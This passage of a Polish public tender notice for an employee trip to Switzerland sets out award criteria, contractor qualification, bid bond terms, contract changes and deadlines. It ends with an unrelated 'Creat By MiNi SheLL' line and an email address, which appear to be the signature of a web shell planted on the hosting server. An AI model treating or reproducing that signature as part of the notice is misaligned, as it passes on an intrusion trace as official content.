kryterium:<br/>Ocena w ramach kryterium będzie odbywać się w oparciu o dokument sporządzony według wzoru formularza „Wykaz usług<br/>polegających na zorganizowaniu i przeprowadzeniu zagranicznych wycieczek” stanowiący załącznik nr 6 do SWZ. Dokument ten<br/>winien zawierać wykaz należycie zorganizowanych i przeprowadzonych zagranicznych wyjazdów (co najmniej 5-dniowych w okresie<br/>ostatnich 5 lat liczonych wstecz od dnia, w którym upływa termin składania ofert (a jeżeli okres prowadzenia działalności jest krótszy<br/>– w tym okresie) z zakwaterowaniem i wyżywieniem, oraz transportem autokarowym dla minimum 30 pracowników jednej instytucji o<br/>wartości minimum 100 000,00 zł brutto każda.<br/>Liczba punktów (B) w ramach kryterium „Doświadczenie Wykonawcy” zostanie przyznana w następujący sposób:<br/>a) wykazanie należytego zorganizowania i przeprowadzenia jednego zagranicznego wyjazdu - 0 pkt,<br/>b) wykazanie należytego zorganizowania i przeprowadzenia dwóch zagranicznych wyjazdów - 20 pkt,<br/>c) wykazanie należytego zorganizowania i przeprowadzenia trzech i więcej zagranicznych wyjazdów - 40 pkt,<br/>W tym kryterium można uzyskać maksymalnie 40 punktów.<br/>UWAGA:<br/>„Wykaz usług polegających na zorganizowaniu i przeprowadzeniu zagranicznych wycieczek” (stanowiący załącznik nr 6 do SWZ) do<br/>oceny ofert w kryterium „Doświadczenie Wykonawcy” składa się wraz z ofertą. Wykaz do oceny w kryterium „Doświadczenie<br/>Wykonawcy” nie należy do rodzaju dokumentów, o których mowa w art. 125 ust. 1 ustawy PZP, a tym samym nie stosuje się art. 128<br/>ust. 1 ustawy PZP. W sytuacji: nie złożenia wykazu, nie wskazania żadnego zadania spełniającego wymagania, nie wskazania<br/>imienia i nazwiska osoby, oferta Wykonawcy w ramach kryterium oceny ofert „Doświadczenie Wykonawcy” otrzyma 0 pkt..<br/>6) Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą ocenę (największą sumę punktów z obydwu kryteriów, z<br/>dokładnością do dwóch miejsc po przecinku).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2) Zamawiający określił warunki udziału w postępowaniu w sposób proporcjonalny do przedmiotu zamówienia oraz<br/>umożliwiający ocenę zdolności wykonawcy do należytego wykonania zamówienia, w szczególności wyrażając je jako<br/>minimalne poziomy zdolności.<br/>3) Zamawiający może na każdym etapie postępowania uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia.<br/>4) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>Zdolności do występowania w obrocie gospodarczym - Zamawiający nie stawia warunku w powyższym zakresie.<br/>Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów -<br/>Wykonawca powinien posiadać aktualny na dzień składania ofert oraz ważny co najmniej do dnia powrotu do Polski<br/>uczestników wyjazdu wpis do Centralnej Ewidencji Organizatorów Turystyki i Przedsiębiorców Ułatwiających Nabywanie<br/>Powiązanych Usług Turystycznych zgodnie z ustawą z dnia 24 listopada 2017 r. o imprezach turystycznych i powiązanych<br/>usługach turystycznych.<br/>Sytuacji ekonomicznej lub finansowej - Wykonawca powinien wykazać, że posiada gwarancję ubezpieczeniową z zakresem<br/>terytorialnym działalności:<br/>a) Imprezy Turystyczne z transportem - Polska i państwa Europejskie.<br/>Zdolności technicznej lub zawodowej - Warunek ten zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w okresie<br/>ostatnich 5 lat liczonych wstecz od dnia, w którym upływa termin składania ofert (a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie) należycie wykonał usługi polegające na zorganizowaniu i przeprowadzeniu zagranicznego wyjazdu<br/>(co najmniej 5-dniowego) z zakwaterowaniem i wyżywieniem, oraz transportem autokarowym dla min 30 pracowników<br/>jednej instytucji o wartości minimum 100 000,00 zł brutto każda. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Do oferty wykonawca<br/>dołącza oświadczenie aktualne na dzień składania ofert o braku podstaw do wykluczenia, spełnianiu warunków udziału w<br/>postępowaniu, w zakresie wskazanym przez zamawiającego. Wzór oświadczenia stanowi załącznik nr 4 do SWZ. Informacje<br/>zawarte w oświadczeniu, stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w<br/>postępowaniu.<br/>2) Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień ich złożenia, w postaci:<br/>a) Oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy w zakresie<br/>o którym mowa w art. 108 ust.1 pkt 1-4 i 6 – załącznik nr 5 do SWZ;<br/>b) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076), z innym wykonawcą,<br/>który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej –<br/>załącznik nr 8 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Do<br/>oferty wykonawca dołącza oświadczenie aktualne na dzień składania ofert o braku podstaw do wykluczenia, spełnianiu warunków<br/>udziału w postępowaniu, w zakresie wskazanym przez zamawiającego. Wzór oświadczenia stanowi załącznik nr 4 do SWZ.<br/>Informacje zawarte w oświadczeniu, stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki<br/>udziału w postępowaniu.<br/>2) Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień ich złożenia, w postaci:<br/>zakwaterowaniem i wyżywieniem oraz przejazdem autokarem dla min 30 pracowników jednej instytucji o wartości minimum 100<br/>000,00 zł brutto każda, nie wcześniej niż w okresie ostatnich 5 lat liczonych wstecz od dnia, w którym upływa termin składania ofert,<br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie. Wykaz zawiera ich rodzaju, wartości, daty i miejsca wykonania<br/>oraz podmioty, na rzecz których roboty te zostały wykonane. Do wykazu należy załączyć dowody określające, czy te usługi zostały<br/>wykonane należycie. Dowodami, o których mowa, są referencje lub inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty– załącznik nr 6 do SWZ;<br/>-Odpis lub informacja, aktualne na dzień składania ofert oraz ważne co najmniej do dnia powrotu do Polski uczestników wyjazdu,<br/>potwierdzające wpis do Centralnej Ewidencji Organizatorów Turystyki i Przedsiębiorców Ułatwiających Nabywanie Powiązanych<br/>Usług Turystycznych zgodnie z ustawą z dnia 24 listopada 2017 r. o imprezach turystycznych i powiązanych usługach<br/>turystycznych.;<br/>-Kartę katalogową lub inny dokument potwierdzający spełnienie wymagań wskazanych w SWZ dotyczących autokaru.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>a) oświadczenia, o których mowa w Rozdziale V.2 i V.3 SWZ;<br/>b) pełnomocnictwo (jeżeli dotyczy – załącznik nr 2 do SWZ);<br/>c) program proponowanej wycieczki opracowany na podstawie OPZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Zamawiający wymaga wniesienia wadium w wysokości:<br/>2400,00 zł (dwa tysiące czterysta zł)<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu<br/>związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/>2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn.: Dz. U. z 2020 r. poz. 299).<br/>3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego Banku Spółdzielczym<br/>nr rachunku: 79 8909 0006 0010 0001 4733 0136 z dopiskiem: „Wadium – Wyjazd do Szwajcarii” Wniesienie wadium w<br/>pieniądzu będzie skuteczne, jeżeli w podanym terminie zostanie zaliczone na rachunku bankowym Zamawiającego.<br/>Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>4. Z treści wadium wnoszonego w formie: gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielonych<br/>przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji<br/>Rozwoju Przedsiębiorczości powinno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez<br/>Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w<br/>okolicznościach określonych w art. 98 ust. 6 PZP.<br/>5. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 2.2. ppkt 2)-4) należy przekazać<br/>Zamawiającemu wraz z Ofertą w oryginale w postaci elektronicznej tj. opatrzonej kwalifikowanym podpisem elektronicznymi<br/>osób upoważnionych do jego wystawienia. Wadium musi zabezpieczać ofertę na daną część zamówienia przez cały okres<br/>związania ofertą. Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy, lub nie będzie<br/>utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o<br/>którym mowa w art. 98 ust. 2 pkt 3 PZP zostanie odrzucona z postępowania na podstawie art. 226 ust. 1 pkt 14 PZP.<br/>6. Treść gwarancji wadialnej musi zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub<br/>instytucji ubezpieczeniowej udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem – określenie przedmiotu zamówienia<br/>3) kwotę gwarancji/poręczenia,<br/>4) zobowiązanie gwaranta/poręczyciela do zapłacenia bezwarunkowo i nieodwołalnie kwoty gwarancji/poręczenia na<br/>pierwsze pisemne żądanie Zamawiającego w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>7. Zamawiający zwraca wadium na zasadach uregulowanych w art. 98 ust. 1 - 5 PZP.. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 4. Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia (spółki<br/>cywilne, konsorcja);<br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i<br/>zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi być załączone do oferty.<br/>2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale V.2.1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie.<br/>4) Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia kluczowych zadań.<br/>5) Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jest spełniony, jeżeli<br/>co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji<br/>te uprawnienia są wymagane.<br/>6) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim przypadku, wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane,<br/>dostawy lub usługi wykonają poszczególni wykonawcy.<br/>7) Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający będzie<br/>żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) w zakresie przedmiotu niniejszej Umowy (w tym sposobu realizacji), terminu realizacji i wynagrodzenia, jednak nie<br/>powodujących zwiększenia wartości Umowy - w przypadku, gdy konieczność wprowadzenia zmian będzie następstwem<br/>postanowień innych umów mających bezpośredni związek z niniejszą umową, w tym umów zawartych pomiędzy<br/>Zamawiającym a instytucjami nadzorującymi lub następstwem, w przypadku, gdy zmiany te nie były znane w dniu zawarcia<br/>umowy,<br/>2) w zakresie przedmiotu niniejszej Umowy (w tym sposobu realizacji), terminu realizacji i wynagrodzenia, jednak nie<br/>powodujących zwiększenia wartości niniejszej Umowy, w przypadku konieczności zrealizowania niniejszej umowy przy<br/>zastosowaniu innych rozwiązań, niż wskazane pierwotnie w przedmiocie niniejszej Umowy ze względu na zmiany<br/>powszechnie obowiązujących przepisów prawa, w przypadku gdy okoliczności te nie były znane w dniu zawarcia niniejszej<br/>Umowy,<br/>3) w zakresie terminu realizacji niniejszej Umowy, przedmiotu umowy (w tym sposobu realizacji) w przypadku, prac nad<br/>uchwaleniem lub nowelizacją powszechnie obowiązujących przepisów prawa, które może mieć wpływ na realizację , a<br/>przewidywany kierunek zmian wskazuje na potrzebę wstrzymania, zawieszenia lub ograniczenia świadczeń stanowiących<br/>przedmiot umowy w oczekiwaniu na dokonanie zmian w przepisach prawa,<br/>4) w zakresie przedmiotu niniejszej Umowy (w tym sposobu realizacji), przy niezmiennym poziomie wynagrodzenia, jeśli<br/>dzięki zmianom nastąpi poprawa wydajności, jakości;<br/>5) w zakresie przedmiotu niniejszej Umowy (w tym sposobu realizacji), wynagrodzenia w wyniku rezygnacji przez<br/>Zamawiającego z części prac w następstwie wystąpienia okoliczności, które nie były znane w momencie zawarcia umowy,<br/>oraz których nie można było przewidzieć w momencie zawarcia niniejszej umowy. W takiej sytuacji wynagrodzenie<br/>Wykonawcy ulega zmniejszeniu proporcjonalnie do zmiany zakresu prac objętych przedmiotem zamówienia;<br/>6) w zakresie przedmiotu niniejszej Umowy (w tym sposobu realizacji), w wyniku zmian w strukturze lub organizacji<br/>Zamawiającego mających wpływ na zakres prac Wykonawcy, przy czym wynagrodzenie Wykonawcy nie może ulec<br/>podwyższeniu, a w razie ograniczenia zakresu prac ulega proporcjonalnemu zmniejszeniu,<br/>7) w zakresie przedmiotu niniejszej Umowy (w tym sposobu realizacji), terminu realizacji oraz pozostałych elementów<br/>niniejszej Umowy w przypadku wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu niniejszej umowy zgodnie<br/>z jej pierwotnymi postanowieniami;<br/>8) w zakresie zmian doprecyzowujących treść niniejszej Umowy,<br/>9) w zakresie terminu obowiązywania niniejszej Umowy poprzez jego wydłużenie, z zachowaniem niezmiennego poziomu<br/>wynagrodzenia, w sytuacji, gdy taka zmiana umożliwi realizację w większym zakresie,<br/>10) w zakresie zmian podwykonawców oraz zakresu podwykonawstwa,<br/>11) w zakresie zmiany wynagrodzenia Wykonawcy, wynikającej ze zmiany przepisów dot. stawki VAT:<br/>a) w przypadku zmiany stawki VAT powodującej zwiększenie kosztów wykonania po stronie Wykonawcy, Zamawiający<br/>dopuszcza możliwość proporcjonalnego zwiększenia wynagrodzenia Wykonawcy o kwotę wynikającą ze zmian stawki VAT<br/>b) w przypadku zmiany stawki VAT powodującej zmniejszenie kosztów wykonania Umowy po stronie Wykonawcy, c) W przypadku drastycznych zmian kursu oraz wzrostu cen paliwa . Impreza kalkulowana wg kursu: 1 EURO – 4,70 zł oraz<br/>ceny transportu oszacowanym przy koszcie paliwa 7,50 PLN/litr. Za drastyczną uznaje się zmianę o 20%.<br/>Zmiana może z inicjatywy Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie propozycji zmian w<br/>formie pisemnej, które powinny zawierać: opis zmiany, uzasadnienie zmiany, koszt zmiany oraz jego wpływ na wysokość<br/>wynagrodzenia, czas wykonania zmiany oraz wpływ zmiany na termin zakończenia niniejszej Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-03-22 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma: https://josephine.proebiz.com</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-03-22 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-04-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający wykluczy wykonawcę w przypadkach, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (Dz.U. 2022 poz. 835). Do Wykonawcy podlegającego wykluczeniu w tym zakresie, stosuje się<br/>art. 7 ust. 3 wspomnianej ustawy

Creat By MiNi SheLL
Email: jattceo@gmail.com